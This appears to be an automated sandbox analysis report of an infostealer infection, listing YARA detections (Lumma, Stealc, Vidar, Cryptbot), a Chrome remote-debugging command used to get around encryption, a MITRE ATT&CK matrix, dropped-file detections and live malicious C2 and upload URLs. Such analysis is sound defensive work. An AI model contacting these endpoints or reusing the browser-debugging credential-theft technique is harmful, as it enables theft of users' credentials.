Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT

Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Directory queried: number of queries: 3003

Source: Yara match	File source: 0000000F.00000003.3221132708.000000000132E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3220821695.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.3352890856.0000000001252000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3220361028.000000000132D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3220821695.000000000132D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.3356052850.000000000126C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.3288752753.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.3300305625.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3220361028.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.3392719887.000000000126D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3221209371.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ccdb824191.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ccdb824191.exe PID: 2876, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 5cbc6b58d3.exe PID: 7604, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: ccdb824191.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ccdb824191.exe PID: 2876, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000022.00000003.3299677003.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3390011704.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3230900745.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3138251493.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3393637637.0000000000E91000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3232792590.0000000000E91000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cd39094ad6.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cd39094ad6.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 95bf820dd4.exe PID: 1084, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	411 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Scheduled Task/Job	2 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	1 Credentials in Registry	23 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	111 Registry Run Keys / Startup Folder	212 Process Injection	4 Obfuscated Files or Information	Security Account Manager	236 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	1 Scheduled Task/Job	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	2 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	111 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	1091 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Bypass User Account Control	Cached Domain Credentials	12 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	471 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	471 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	45%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	100%	Avira	HEUR/AGEN.1306956
C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Avira	HEUR/AGEN.1306956
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	53%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	63%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	63%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	53%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	45%	ReversingLabs	Win32.Infostealer.Tinba

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
t.me	149.154.167.99	true	false	high
sedone.online	116.203.12.114	true	false	high
contile.services.mozilla.com	34.117.188.166	true	false	high
youtube.com	142.250.181.78	true	false	high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	high
home.twentygr20sb.top	141.8.192.141	true	false	high
twentygr20sb.top	141.8.192.141	true	false	high
steamcommunity.com	23.37.186.133	true	false	high
tacitglibbr.biz	104.21.50.161	true	false	high
ipv4only.arpa	192.0.0.170	true	false	high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	high
www.google.com	172.217.21.36	true	false	high
httpbin.org	34.226.108.155	true	false	high
dare-curbys.biz	unknown	unknown	false	high
impend-differ.biz	unknown	unknown	false	high
spocs.getpocket.com	unknown	unknown	false	high
covery-mover.biz	unknown	unknown	false	high
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
dwell-exclaim.biz	unknown	unknown	false	high
zinc-sneark.biz	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
formy-spill.biz	unknown	unknown	false	high
se-blurry.biz	unknown	unknown	false	high
print-vexer.biz	unknown	unknown	false	high
drive-connect.cyou	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	true
formy-spill.biz	true
https://steamcommunity.com/profiles/76561199724331900	true
http://home.twentygr20sb.top/kNcZsqQOSglxukmuLodY1734167391	true
dwell-exclaim.biz	true
http://twentygr20sb.top/v1/upload.php	true
https://httpbin.org/ip	false
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false

URLs from Memory and Binaries

Name	Source	Malicious
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	false
http://anglebug.com/4633	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://anglebug.com/7382	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://www.gstatic.cn/recaptcha/	d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000010.00000003.3113410518.000044C001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111024822.000044C0010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112059549.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111314765.000044C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112153876.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110890431.000044C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113602675.000044C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111666200.000044C00109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112300126.000044C000FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112111133.000044C000EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110965936.000044C001080000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.google.com/	chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	false
https://screenshots.firefox.com	firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3456131295.00000269D9FB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3433468138.00000269D82B2000.00000004.00000800.00020000.00000000.sdmp	false
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	false
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	false
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000010.00000003.3113410518.000044C001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113602675.000044C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3449103760.00000269D9420000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3326947439.00000269DC86F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3326323227.00000269DC838000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3325516382.00000269DC600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3448689533.00000269D9320000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000003.3326626929.00000269DC853000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697913020.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153064493.000044C001768000.00000004.00000800.00020000.00000000.sdmp	false
